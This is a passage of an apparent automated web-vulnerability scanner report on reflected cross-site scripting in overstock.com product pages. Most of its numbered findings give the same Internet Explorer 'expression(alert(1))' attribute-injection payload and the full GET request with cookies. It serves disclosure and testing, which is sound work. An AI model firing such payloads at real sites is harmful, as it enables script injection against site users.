GET /Clothing-Shoes/DKNY-Womens-Long-Quilted-Zip-front-Down-Coat/5129186/product.html?b3b05"style%3d"x%3aexpression(alert(1))"7c4fc8bbbe7=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.28. http://www.overstock.com/Clothing-Shoes/Daxx-Mens-Top-Grain-Deerskin-Leather-Gloves-with-Thinsulate-Lining/2092746/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d252"style%3d"x%3aexpression(alert(1))"7b064bdd95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9d252"style="x:expression(alert(1))"7b064bdd95 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Daxx-Mens-Top-Grain-Deerskin-Leather-Gloves-with-Thinsulate-Lining/2092746/product.html?9d252"style%3d"x%3aexpression(alert(1))"7b064bdd95=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.29. http://www.overstock.com/Clothing-Shoes/Elio-Womens-3-4-sleeve-Pullover-Sweater/5113820/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37afd"style%3d"x%3aexpression(alert(1))"a385aa3962a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 37afd"style="x:expression(alert(1))"a385aa3962a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Elio-Womens-3-4-sleeve-Pullover-Sweater/5113820/product.html?37afd"style%3d"x%3aexpression(alert(1))"a385aa3962a=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.30. http://www.overstock.com/Clothing-Shoes/Etienne-Aigner-Leather-Tote-Bag/5160306/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa850"style%3d"x%3aexpression(alert(1))"d836fa131f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fa850"style="x:expression(alert(1))"d836fa131f0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Etienne-Aigner-Leather-Tote-Bag/5160306/product.html?fa850"style%3d"x%3aexpression(alert(1))"d836fa131f0=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.31. http://www.overstock.com/Clothing-Shoes/Fendi-FS-478-S-Womens-Designer-Sunglasses/4456999/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f42b"style%3d"x%3aexpression(alert(1))"a9af4174a88 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f42b"style="x:expression(alert(1))"a9af4174a88 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Fendi-FS-478-S-Womens-Designer-Sunglasses/4456999/product.html?6f42b"style%3d"x%3aexpression(alert(1))"a9af4174a88=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.32. http://www.overstock.com/Clothing-Shoes/Fergie-Womens-Missy-Peep-toe-Heels/5235311/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd6ae"style%3d"x%3aexpression(alert(1))"dba8e86bc84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bd6ae"style="x:expression(alert(1))"dba8e86bc84 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Fergie-Womens-Missy-Peep-toe-Heels/5235311/product.html?bd6ae"style%3d"x%3aexpression(alert(1))"dba8e86bc84=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.33. http://www.overstock.com/Clothing-Shoes/Ferrecci-Mens-Grey-Two-button-Suit/4251947/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 734dc"style%3d"x%3aexpression(alert(1))"74977cb26be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 734dc"style="x:expression(alert(1))"74977cb26be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Ferrecci-Mens-Grey-Two-button-Suit/4251947/product.html?734dc"style%3d"x%3aexpression(alert(1))"74977cb26be=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.34. http://www.overstock.com/Clothing-Shoes/Ferrecci-Mens-Light-Chocolate-Brown-Suit/4255610/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ca49"style%3d"x%3aexpression(alert(1))"32b9b3f096 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3ca49"style="x:expression(alert(1))"32b9b3f096 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Ferrecci-Mens-Light-Chocolate-Brown-Suit/4255610/product.html?3ca49"style%3d"x%3aexpression(alert(1))"32b9b3f096=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.35. http://www.overstock.com/Clothing-Shoes/Fringed-Pashmina-Shawl/4587463/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1548"style%3d"x%3aexpression(alert(1))"8fddb195cf9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c1548"style="x:expression(alert(1))"8fddb195cf9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Fringed-Pashmina-Shawl/4587463/product.html?c1548"style%3d"x%3aexpression(alert(1))"8fddb195cf9=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.36. http://www.overstock.com/Clothing-Shoes/Fringed-Pashmina-Wrap/4587460/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d63f"style%3d"x%3aexpression(alert(1))"5854008dc02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d63f"style="x:expression(alert(1))"5854008dc02 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Fringed-Pashmina-Wrap/4587460/product.html?5d63f"style%3d"x%3aexpression(alert(1))"5854008dc02=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.37. http://www.overstock.com/Clothing-Shoes/Glaze-by-Adi-Womens-Faux-Suede-Buckle-Accent-Tall-Boots/5162852/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50570"style%3d"x%3aexpression(alert(1))"1fd492eab32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 50570"style="x:expression(alert(1))"1fd492eab32 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Glaze-by-Adi-Womens-Faux-Suede-Buckle-Accent-Tall-Boots/5162852/product.html?50570"style%3d"x%3aexpression(alert(1))"1fd492eab32=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.38. http://www.overstock.com/Clothing-Shoes/Grane-Womens-Double-breasted-Military-Coat/5237784/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8767c"style%3d"x%3aexpression(alert(1))"30caaea086 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8767c"style="x:expression(alert(1))"30caaea086 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Grane-Womens-Double-breasted-Military-Coat/5237784/product.html?8767c"style%3d"x%3aexpression(alert(1))"30caaea086=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.39. http://www.overstock.com/Clothing-Shoes/Guess-Womens-Oversize-Flower-Sunglasses/4226816/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6938"style%3d"x%3aexpression(alert(1))"651945f2caa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c6938"style="x:expression(alert(1))"651945f2caa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Guess-Womens-Oversize-Flower-Sunglasses/4226816/product.html?c6938"style%3d"x%3aexpression(alert(1))"651945f2caa=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.40. http://www.overstock.com/Clothing-Shoes/Jessica-Simpson-Womens-Double-breasted-Coat/5149474/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4126"style%3d"x%3aexpression(alert(1))"2341eb9682a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a4126"style="x:expression(alert(1))"2341eb9682a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Jessica-Simpson-Womens-Double-breasted-Coat/5149474/product.html?a4126"style%3d"x%3aexpression(alert(1))"2341eb9682a=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.41. http://www.overstock.com/Clothing-Shoes/JoJo-Designs-Girls-2-piece-Blue-Brown-Floral-Zebra-Rumba-Set/4245360/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87978"style%3d"x%3aexpression(alert(1))"f1df361dfda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 87978"style="x:expression(alert(1))"f1df361dfda in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
